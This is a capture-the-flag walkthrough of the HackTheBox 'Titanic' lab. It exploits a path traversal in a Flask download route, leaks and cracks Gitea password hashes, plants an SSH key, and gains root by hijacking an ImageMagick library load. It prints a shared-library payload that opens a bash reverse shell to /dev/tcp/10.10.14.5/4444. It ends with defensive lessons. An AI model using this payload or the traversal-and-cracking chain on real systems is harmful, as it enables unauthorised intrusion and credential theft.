Titanic

2025-02-15

INTRODUCTION

Titanic was released as the week 6 box for HTB’s Season 7 Vice. It’s a bit of an odd box, in that the first half was very, very easy while the second half was more involved. This box forces you to explore many facets of Gitea, all the way from recon to root.

Recon is easy. We discover very quickly that there is a subdomain. Visiting that subdomain, we see it is a Gitea instance. Better yet, contained in that Gitea instance is a repo for the main website - effectively turning (most of) foothold into a whitebox exercise.

Foothold is very fast, as long as you know a bit about Gitea (check out the Gitea part of my Compiled walkthrough for a quick preview of what we might encounter on Titanic). By reading the source code of the main website, we discover a glaring vulnerability that can be leveraged into a file read. Thankfully, this file read is relatively unrestricted - go hunting for some credentials and you will find some hashes before long.

A little hash-cracking will lead to the credentials you need for RCE and the user flag. If desired, you can go take over Gitea at that point, but it is not required. My best advice is to just check for odd files in the filesystem - this will lead you straight to a script that calls software with an identifiable version. Upon searching the exact version of the software, it becomes clear there is a vulnerability we can exploit for privilege escalation. The vulnerability may be confusing to anyone unfamiliar, but the PoC is trivial; utilize the PoC (a few times) and you’ll easily achieve the root flag.

Personally, I didn’t enjoy this box as much as many others released during this season. It felt a little “guessy” for my taste, there was a substantial rabbit-hole, and the trick to privesc was “look at the exact same blog article as the box creator”… but perhaps I’m just not as knowledgeable as others?

RECON

nmap scans

Port scan

I’ll start by setting up a directory for the box, with an nmap subdirectory. I’ll set $RADDR to the target machine’s IP and scan it with a TCP port scan over all 65535 ports:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`

sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)

|_ 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)

80/tcp open http Apache httpd 2.4.52

|_http-title: Did not follow redirect to http://titanic.htb/

|_http-server-header: Apache/2.4.52 (Ubuntu)
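For anyone who finds the grep/sed pipeline behind $TCPPORTS hard to read, here is a rough Python equivalent. It is only a sketch: the function name open_tcp_ports and the sample text are mine, and it assumes the same normal-format (-oN) nmap output shown above.

```python
import re


def open_tcp_ports(nmap_text: str) -> str:
    """Return a comma-separated list of the TCP ports listed in nmap -oN output."""
    ports = []
    for line in nmap_text.splitlines():
        # Port lines look like "22/tcp open ssh"; every other line is skipped.
        match = re.match(r"^(\d+)/tcp\b", line)
        if match:
            ports.append(match.group(1))
    return ",".join(ports)


# Sample text modelled on the port scan result above.
sample = """PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
"""
print(open_tcp_ports(sample))  # 22,80
```

Like the shell version, this keeps every line that starts with a number followed by /tcp, regardless of the reported state.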

Vuln scan

Now that we know what services might be running, I’ll do a vulnerability scan:

sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR

No results.

UDP scan

To be thorough, I’ll also do a scan over the common UDP ports. UDP scans take quite a bit longer, so I limit it to only common ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No results.

Webserver Strategy





Noting the redirect from the script scan, I’ll add titanic.htb to my /etc/hosts and do banner-grabbing for the web server:

DOMAIN=titanic.htb

echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts

☝️ I use tee instead of the append operator >> so that I don’t accidentally blow away my /etc/hosts file with a typo of > when I meant to write >>.

whatweb --aggression 3 http://$DOMAIN && curl -IL http://$RADDR

(Sub)domain enumeration



Next I’ll perform vhost and subdomain enumeration. First, I’ll check for alternate domains at this address:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v

Next I’ll check for subdomains of titanic.htb:

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v

Looks like there’s a dev subdomain. I’ll add that to /etc/hosts too:

echo -e "$RADDR\tdev.$DOMAIN" | sudo tee -a /etc/hosts
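If the Host-header trick behind vhost fuzzing is unfamiliar, the idea can be sketched in a few lines of Python. This is not how ffuf is implemented; the helper names (candidate_hosts, probe, interesting) and the response sizes in the demo are hypothetical, and the "baseline" comparison is only a crude stand-in for ffuf's auto-calibration.

```python
import http.client


def candidate_hosts(words, domain):
    """Build the Host header values to try, e.g. 'dev.titanic.htb'."""
    return [
        f"{w.strip()}.{domain}"
        for w in words
        if w.strip() and not w.strip().startswith("#")
    ]


def probe(ip, host, timeout=4.0):
    """Request / from the IP with a chosen Host header; return (status, body length)."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def interesting(results, baseline):
    """Keep only the hosts whose response differs from the default (baseline) response."""
    return [host for host, signature in results.items() if signature != baseline]


# Offline demo with made-up response signatures (status, size).
hosts = candidate_hosts(["dev", "# a comment line", "", "foo"], "titanic.htb")
fake_results = {hosts[0]: (200, 13870), hosts[1]: (301, 0)}
print(interesting(fake_results, baseline=(301, 0)))  # ['dev.titanic.htb']
```

In real use, probe() would be called once with a nonsense hostname to get the baseline, then once per candidate.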





Directory enumeration

I’ll continue with directory enumeration. First, on http://titanic.htb:

I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.

WLIST=/usr/share/wordlists/dirs-and-files.txt

ffuf -w $WLIST:FUZZ -u http://$DOMAIN/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4 -v

A quick banner grab on dev.titanic.htb shows that it’s actually Gitea - so there’s little to be gained from fuzzing it. It’s open source, after all: if we want to know more, we could just docker pull the correct version.

Exploring titanic.htb

Next I’ll browse the target website manually a little.



ZAP Spider

I find it’s really helpful to turn on a web proxy while I browse the target for the first time, so I’ll turn on FoxyProxy and open up ZAP. Sometimes this has been key to finding hidden aspects of a website, but it has the side benefit of taking highly detailed notes, too 😉

Now, in ZAP, I’ll add the target titanic.htb and all of its subdomains to the Default Context and proceed to “Spider” the website (actively build a sitemap by following all of the links and references to other pages). Here’s the resulting sitemap for titanic.htb:

Interesting! I’ll have to come back and try out the book form and try downloading a ticket later! 🚩



The target looks like it’s a website for booking a trip on the Titanic! So cool 😂



The only active content on the page appears to be the form for booking a ticket:

When I submit that form, I’m redirected to download a ticket, which is just JSON of the data I submitted:

{"name": "Jimbob", "email": "jim@bob.htb", "phone": "123-456-7890", "date": "1912-04-10", "cabin": "Suite"}

Exploring dev.titanic.htb



It’s our old friend, Gitea! The footer reveals that it’s running version 1.22.1, which is fairly current: at the time of writing, the latest x64 release is 1.23.3.

There are two repos listed, both by the developer user (although there is also an administrator user):

docker-config

The docker-config repo has two subdirectories, gitea and mysql - each has a simple docker-compose.yml file.

version: '3'
services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22" # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data # Replace with your path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always

This leaks a couple of goodies to us:

- A user on the host system is called developer

- There’s a reverse proxy running that’s allowing us to access gitea:3000 via dev.titanic.htb

- There’s a separate SSH connection just for Gitea, on the target host’s port 2222

version: '3.8'
services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    ports:
      - "127.0.0.1:3306:3306"
    environment:
      MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
      MYSQL_DATABASE: tickets
      MYSQL_USER: sql_svc
      MYSQL_PASSWORD: sql_password
    restart: always

Great! We already found some database credentials:

- Low priv: tickets / sql_svc : sql_password

- MySQL root password: MySQLP@$$w0rd!



flask-app

The flask-app repo appears to be the website running at titanic.htb:

Under /tickets there are two tickets that were (accidentally?) committed to the repo. It’s the two main characters from the movie Titanic:

{"name": "Rose DeWitt Bukater", "email": "rose.bukater@titanic.htb", "phone": "643-999-021", "date": "2024-08-22", "cabin": "Suite"}

{"name": "Jack Dawson", "email": "jack.dawson@titanic.htb", "phone": "555-123-4567", "date": "2024-08-23", "cabin": "Standard"}

The /templates directory just has index.html. It doesn’t appear to render any inputs (i.e. it’s completely static), so no risk of template injection there.

app.py is where it gets interesting. It’s a flask app with only three endpoints:

- GET /

- POST /book

- GET /download

But take a close look at GET /download and you’ll see that the author never validates the ticket parameter. The value is read directly from request.args and joined onto TICKETS_DIR as-is:

@app.route('/download', methods=['GET'])
def download_ticket():
    ticket = request.args.get('ticket')
    if not ticket:
        return jsonify({"error": "Ticket parameter is required"}), 400

    json_filepath = os.path.join(TICKETS_DIR, ticket)

    if os.path.exists(json_filepath):
        return send_file(json_filepath, as_attachment=True, download_name=ticket)
    else:
        return jsonify({"error": "Ticket not found"}), 404

🚨 Decent! That is 100% an LFI vulnerability.

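We should be able to specify GET /download?ticket=[anything] to download any file the web app’s user can read: os.path.join() discards TICKETS_DIR entirely when ticket is an absolute path, and nothing stops ../ sequences either.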
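To see why the os.path.join() call in download_ticket() is the problem, here is a tiny experiment that mimics only the path handling. It is a sketch: TICKETS_DIR = "tickets" is my assumption about the constant in app.py, and I use posixpath so the result matches the Linux target regardless of where it is run.

```python
import posixpath  # POSIX path rules, matching the Linux target

TICKETS_DIR = "tickets"  # assumed value; the real constant is defined in app.py


def resolve(ticket: str) -> str:
    """Join the ticket onto TICKETS_DIR like the route does, then normalise for display."""
    return posixpath.normpath(posixpath.join(TICKETS_DIR, ticket))


print(resolve("abc123.json"))  # tickets/abc123.json
print(resolve("../app.py"))    # app.py
print(resolve("/etc/passwd"))  # /etc/passwd
```

The last two lines are the interesting ones: a relative traversal climbs out of the tickets directory, and an absolute path replaces it completely.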

FOOTHOLD

Checking the LFI







Mostly as a convenient way to do enumeration, I’ll try using my tool, Alfie. If you haven’t tried it, go check it out (it’s getting better!). First I’ll run it in filter mode to reduce false-positives:

python3 alfie.py -u "http://titanic.htb/download?ticket=" --max 4 filter

Great, copy paste the green stuff to use as filters for scan and enum modes:

python3 alfie.py -u "http://titanic.htb/download?ticket=" --max 4 -fc '404' -fs '10-51' -fw '3' scan

Perfect, we found a valid LFI, so let’s run it in enum mode - provide the bold/green part of the output of scan mode as the --example-lfi to enum mode:





python3 alfie.py -u "http://titanic.htb/download?ticket=" --max 4 -fc '404' -fs '10-51' -fw '3' enum --example-lfi '/etc/passwd'



That mode will dump files that it finds into the ./output directory, so we can easily view them:



That’s great, but I’m even more interested in paths relative to the tickets directory (instead of just /etc/passwd). We can do this by using scan mode with the --relative-only / -rel argument:

python3 alfie.py -u "http://titanic.htb/download?ticket=" --max 4 -fc '404' -fs '10-51' -fw '3' scan -rel

Let’s repeat enum mode, but this time we’ll provide the relative path LFI as the --example-lfi:

python3 alfie.py -u "http://titanic.htb/download?ticket=" --max 4 -fc '404' -fs '10-51' -fw '3' --target_system 'linux,python' enum --example-lfi '../app.py'

Nothing new… 🤔

LFI Gitea DB

I’ve played with gitea before and found that sometimes it uses an SQLite3 database, but what filepath would it be at?

I took a copy of the gitea docker-compose.yml file from the docker-config repo and spun up my own local instance, then opened a terminal in it:

mkdir gitea && cd gitea

vim docker-compose.yml # paste in contents of the docker-config/gitea/docker-compose.yml

docker compose up # it will need to pull the image(s) from dockerhub

docker compose exec gitea sh

After doing a find for the exact filename gitea.db, I found it in the /data/gitea directory inside the container. We already saw that /data is a mapped volume (/home/developer/gitea/data on the host). Awesome! Let’s try to leak the database using the LFI:
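Translating the container path into a host path is just a prefix swap using the volume line from docker-compose.yml. The sketch below shows that reasoning; the helper name container_to_host is mine, and it assumes an absolute path works in the ticket parameter the same way /etc/passwd did.

```python
from urllib.parse import quote


def container_to_host(container_path: str, volume: str) -> str:
    """Map a path inside the container to the host, given a 'host_dir:container_dir' volume."""
    host_dir, container_dir = volume.split(":", 1)
    host_dir = host_dir.rstrip("/")
    container_dir = container_dir.rstrip("/")
    if not container_path.startswith(container_dir + "/"):
        raise ValueError("path is not inside the mapped volume")
    return host_dir + container_path[len(container_dir):]


# Volume mapping copied from docker-config/gitea/docker-compose.yml.
volume = "/home/developer/gitea/data:/data"
host_path = container_to_host("/data/gitea/gitea.db", volume)
url = "http://titanic.htb/download?ticket=" + quote(host_path, safe="/")

print(host_path)  # /home/developer/gitea/data/gitea/gitea.db
print(url)
```

The printed URL can be fetched with any HTTP client and the response saved to disk for inspection.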

Let’s see if it’s telling the truth…

Looks legit. Opening it up reveals that, yep, we got the Gitea DB! 😁



I’ve dealt with this before on other boxes, but Gitea has a very large users table, and uses PBKDF2 hashes for the passwords. If you check out the schema of the user table, you’ll see what I mean:

At one point, I made a tool for extracting these hashes into a format that hashcat can use. However, I later found a much, much better way by @0xdf to do the same thing, just with a bash one-liner:

DATABASE_FILE=home-developer-gitea-data-gitea-gitea.db

sqlite3 $DATABASE_FILE "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes

Why all this fuss?

The closest mode Hashcat has for this type of hash (PBKDF2-HMAC-SHA256) is mode 10900.

hashcat --hash-info -m 10900 | grep Example.Hash

# Example.Hash.Format.: plain

# Example.Hash........: sha256:1000:NjI3MDM3:vVfavLQL9ZWjg8BUMq6/FB8FtpkIGWYk

The Gitea database gives us almost what we need, except the salt and hash are in hex, not base64. Therefore, we need to do some conversions.

The above method from 0xdf is actually really simple:

- Do a query for the users table: name, password hash, and salt. Store the result in the data variable

- Transform the salt and hash from hex to base64

- Concatenate the result into the expected hash format (plus the username)
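The same three steps can be sketched in Python, which also makes it easy to sanity-check a single candidate password without hashcat. Treat it as an illustration only: the function names are mine, the demo row is synthetic (not from the box), and the 50-byte key length is my understanding of Gitea's PBKDF2 settings rather than something shown in this walkthrough.

```python
import base64
import hashlib


def gitea_to_hashcat(name: str, passwd_hex: str, salt_hex: str, iterations: int = 50000) -> str:
    """Convert one row of Gitea's user table (hex fields) into a hashcat mode 10900 line."""
    digest = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    salt = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    return f"{name}:sha256:{iterations}:{salt}:{digest}"


def check_password(line: str, candidate: str) -> bool:
    """Recompute PBKDF2-HMAC-SHA256 for one candidate and compare it to the stored digest."""
    _name, _algo, iterations, salt_b64, digest_b64 = line.split(":")
    salt = base64.b64decode(salt_b64)
    digest = base64.b64decode(digest_b64)
    derived = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), salt, int(iterations), dklen=len(digest)
    )
    return derived == digest


# Synthetic demo row: made-up salt and password, 50-byte key (assumed Gitea default).
salt_hex = "00112233445566778899aabbccddeeff"
passwd_hex = hashlib.pbkdf2_hmac(
    "sha256", b"hunter2", bytes.fromhex(salt_hex), 50000, dklen=50
).hex()
line = gitea_to_hashcat("demo", passwd_hex, salt_hex)
print(check_password(line, "hunter2"))  # True
```

This is far too slow for a real wordlist, which is exactly why the hashes get handed to hashcat.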

That creates a perfectly-formatted file that we can throw at hashcat:



hashcat gitea.hashes $WLIST --username

(it should recognize the hashes as mode 10900)

👍 the first one is the user that I created (jimbob), but the second one is an actual hit! developer : 25282528

USER FLAG

Credential Reuse

We already saw from the /etc/passwd file that developer is the only “regular” user on the target host, so I’m very hopeful for credential reuse. Let’s review our lists of known creds and known services with authentication:

| | Service | Username | Password |
|---|---|---|---|
| ✅ | Gitea | developer | 25282528 |
| ❌ | Gitea | administrator | 25282528 |
| ✅ | SSH | developer | 25282528 |
| ❌ | SSH | root | 25282528 |

Credential reuse confirmed!

☝️ I checked out the Gitea account as developer, and there was nothing private - thus nothing new to see.



ssh developer@titanic.htb # 25282528

Excellent, now we know that developer : 25282528 is a valid credential, and we have SSH on the target! 🎉

The user flag is in developer’s home directory:

cat /home/developer/user.txt

ROOT FLAG

Local enumeration - developer



A quick check of netstat shows a few internally-listening services:

However, this mostly just confirms what we already knew about the target:

- Gitea is running on port 3000 and has its own SSH running on 2222

- The titanic.htb Flask app is running on port 5000.

But what’s this other service on 35553? In my experience, it’s probably an uptime/health monitoring tool for the HTB instance:

nc localhost 35553

# HTTP/1.1 400 Bad Request

# Content-Type: text/plain; charset=utf-8

# Connection: close

#

#400 Bad Request

I’ll keep this service in mind, but it’s probably unimportant.

In the /home/developer directory, we see two important-looking subdirectories:

- mysql: boring, just has the same docker-compose.yml we saw earlier

- gitea: quite a deep structure, with lots in it

Pivoting into Gitea

🚫 This section does not lead toward privilege escalation. It provides some interesting context about Gitea, but if you’re short on time, please proceed to the next section.





Luckily, I found a .ssh directory inside there! And there’s already an authorized_keys file… so whatever user this connects to, there’s a solid chance that they have key-based authentication enabled for SSH:

Let’s take a sec to generate a keypair and add one into that file:

ssh-keygen -t rsa -b 1024 -N 'h4wkh4wk' -f id_rsa

cat id_rsa.pub # [COPY]

echo '[PASTE]' >> /home/developer/gitea/data/git/.ssh/authorized_keys

We already saw in the gitea docker-compose.yml that there was a port forward happening: from port 2222 in the host system to port 22 in the gitea container. I think this authorized_keys file has something to do with that.



But who is the user? To find out, I opened up my local instance of gitea:

cd gitea

docker compose up

docker compose exec gitea sh

We saw the environment variables inside the docker-compose.yml that establish USER_UID=1000:

Great, so it’s probably just git then, eh? Let’s forward the port 2222 and try logging in

ssh -L 1234:localhost:2222 developer@titanic.htb

ssh -i ./id_rsa git@localhost -p 1234

👍 worked like a charm!

But there’s nothing in the container, really. Nothing we haven’t already seen.

Filesystem enumeration

Before I started playing around with Gitea, I only really looked inside /home/developer for interesting files. That was a mistake - even a cursory check of the filesystem reveals some odd files sitting in /opt:

tree -L 2 /opt

# .

# ├── app

# │ ├── app.py

# │ ├── static

# │ ├── templates

# │ └── tickets

# ├── containerd [error opening dir]

# └── scripts

# └── identify_images.sh

😮 /opt/app is clearly the Flask app running titanic.htb, but what’s this /opt/scripts/identify_images.sh?

cd /opt/app/static/assets/images

truncate -s 0 metadata.log

find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Let’s think about what this script does:

- Changes working directory to /opt/app/static/assets/images

- Clears the metadata.log file

- Runs magick identify on each .jpg file inside the directory, and appends the result to metadata.log

👀 Oh no… Imagemagick again? Sometimes it’s easy.

Sometimes…



ImageMagick

Who knows, maybe it won’t even be related. For context, ImageMagick was the Typhoid Mary of a huge family of very serious vulnerabilities, starting several years ago. To investigate, let’s check magick --version:

A web search of that (exact) version leads to several results, but a lot of the results lead back to one particular vuln advisory:

“ImageMagick is a free and open-source software suite, used for editing and manipulating digital images. The AppImage version ImageMagick might use an empty path when setting MAGICK_CONFIGURE_PATH and LD_LIBRARY_PATH environment variables while executing, which might lead to arbitrary code execution by loading malicious configuration files or shared libraries in the current working directory while executing ImageMagick. The vulnerability is fixed in 7.11-36.”

(In case you’re wondering, yes, that is a typo in the tenable advisory… should read 7.1.1-36 🙄)
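The “empty path” wording in that advisory confused me at first, so here is a small model of it. On Linux, the dynamic loader treats a zero-length entry in LD_LIBRARY_PATH as the current working directory, so a value ending in a stray colon quietly adds the cwd to the search list. The function name search_dirs and the AppImage mount path below are hypothetical; this only models the lookup order, it does not load anything.

```python
def search_dirs(path_value: str, cwd: str) -> list:
    """Expand a colon-separated search path, treating empty entries as the cwd."""
    return [entry if entry else cwd for entry in path_value.split(":")]


# Hypothetical AppImage library dir followed by an empty (unset) original value.
value = "/tmp/.mount_magick/usr/lib" + ":" + ""
cwd = "/opt/app/static/assets/images"

print(search_dirs(value, cwd))
# ['/tmp/.mount_magick/usr/lib', '/opt/app/static/assets/images']
```

That is why the working directory of the script matters so much: anything we can write there becomes a candidate library location.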

The references on the tenable article all lead towards a GHSA: GHSA-8rxc-922v-phg8. GHSAs don’t usually include any PoC… but this one does! 😁

There are two PoCs - one for each case mentioned in the description I quoted above (one for MAGICK_CONFIGURE_PATH and another for LD_LIBRARY_PATH). Both result in arbitrary command execution:

cat << EOF > ./delegates.xml

<delegatemap><delegate xmlns="" decode="XML" command="id"/></delegatemap>

EOF

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

__attribute__((constructor)) void init(){

system("id");

exit(0);

}

EOF



As usual, there are several options for us to escalate privilege. I’ve chosen to simply pop a reverse shell. As such, I’ve adjusted the PoC to this:

cd /opt/app/static/assets/images

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

__attribute__((constructor)) void init(){

system("bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'");

exit(0);

}

EOF

Since we’re attempting a reverse shell, let’s start a listener:

sudo ufw allow from $RADDR to any port 4444 proto tcp

nc -lvnp 4444

Moments later, we catch a reverse shell!

The root flag is in the usual spot. Read it to finish off the box:

cat /root/root.txt

EXTRA CREDIT

Root scripts

As developer, we couldn’t fully run the script that we found in /opt/scripts because the metadata.log file permissions didn’t allow it (we can still run it, but I hadn’t by the time the reverse shell popped).

I think I understand the exploit; we were simply creating a malicious shared library that gets loaded from the current working directory when ImageMagick runs. So how did our reverse shell pop automatically?

As root, we can very easily see what’s going on. Check the crontab:

crontab -l

# * * * * * /opt/scripts/identify_images.sh && /root/cleanup.sh

# */10 * * * * /root/revert.sh

OK - that makes sense. I’m satisfied now 😂
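For anyone rusty on cron syntax, the first field of each entry is the minute. A minimal sketch of how those two minute fields expand (my own helper, supporting only the forms that appear in this crontab) shows why the shell arrived within a minute:

```python
def minute_matches(field: str, minute: int) -> bool:
    """Match a cron minute field; handles only '*', '*/N' and a plain number."""
    if field == "*":
        return True
    if field.startswith("*/"):
        return minute % int(field[2:]) == 0
    return int(field) == minute


identify_runs = [m for m in range(60) if minute_matches("*", m)]
revert_runs = [m for m in range(60) if minute_matches("*/10", m)]

print(len(identify_runs))  # 60
print(revert_runs)         # [0, 10, 20, 30, 40, 50]
```

So identify_images.sh fires every minute as root, while revert.sh only runs every ten minutes.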

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.Tools:

rm -rf /tmp/.Tools

Attacker

There’s also a little cleanup to do on my local / attacker machine. I’ll get rid of the Gitea docker image I pulled, just to save disk space:

docker stop gitea

docker rm gitea

docker image rm gitea/gitea

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

LESSONS LEARNED

Attacker

📄 Some databases are files. Early on in this box, we exploited a file read vulnerability. It’s easy to think “all I have is a file read exploit; I can’t reach the database”, but that would be false! Several common types of databases are self-contained in a small portion of the filesystem and can easily be exfiltrated. In Titanic we were lucky to only need to gain access to an SQLite database (notable in that the DB is a single file).

👓 Take a look at the filesystem before diving too deep into any findings. On this box, I accidentally went way too far into Gitea after I had SSH access to the box. It was neat to learn a bit about Gitea, but I was wasting my time when the actual privesc vector was right in front of me!

🌐 If you get an exact version of any running software, check it for CVEs. This practice will save a lot of time, but it’s something I often forget to do. It’s important to be diligent and deliberate with research about publicly disclosed vulnerabilities.

Defender

💬 Never use string interpolation with user-controllable values. On this box, we initially gained an LFI through a flaw in the Flask app running the main website: the developer wrote the download route such that the querystring argument was joined into a file path directly, without sanitization or validation. As a result, we could easily read any file we wanted.

🐛 Least Privilege - always important. Referring to the same flaw as above, simply using Flask properly would have helped a lot to prevent the LFI. Application-level logic could have easily prevented the LFI. Alternatively, the LFI could have been prevented at the OS-level by creating a service account for Flask/Werkzeug and granting read access only to the tickets directory. Using chroot for the web app is also a solid choice.
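As a rough idea of what that application-level check could look like, here is a standard-library sketch. It is not the box author's fix; the function name safe_ticket_path is mine, and it simply refuses any ticket value that resolves outside the tickets directory.

```python
import os


def safe_ticket_path(tickets_dir: str, ticket: str) -> str:
    """Return the resolved ticket path, or raise ValueError if it leaves tickets_dir."""
    base = os.path.realpath(tickets_dir)
    target = os.path.realpath(os.path.join(base, ticket))
    # commonpath compares whole path components, so "tickets2" is not mistaken for "tickets".
    if target == base or os.path.commonpath([base, target]) != base:
        raise ValueError("ticket path escapes the tickets directory")
    return target


for attempt in ("abc123.json", "../app.py", "/etc/passwd"):
    try:
        safe_ticket_path("tickets", attempt)
        print(attempt, "-> allowed")
    except ValueError:
        print(attempt, "-> rejected")
```

In a real Flask app, the built-in send_from_directory helper is the more idiomatic route, since it performs this kind of check for you.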

Thanks for reading

🤝🤝🤝🤝

@4wayhandshake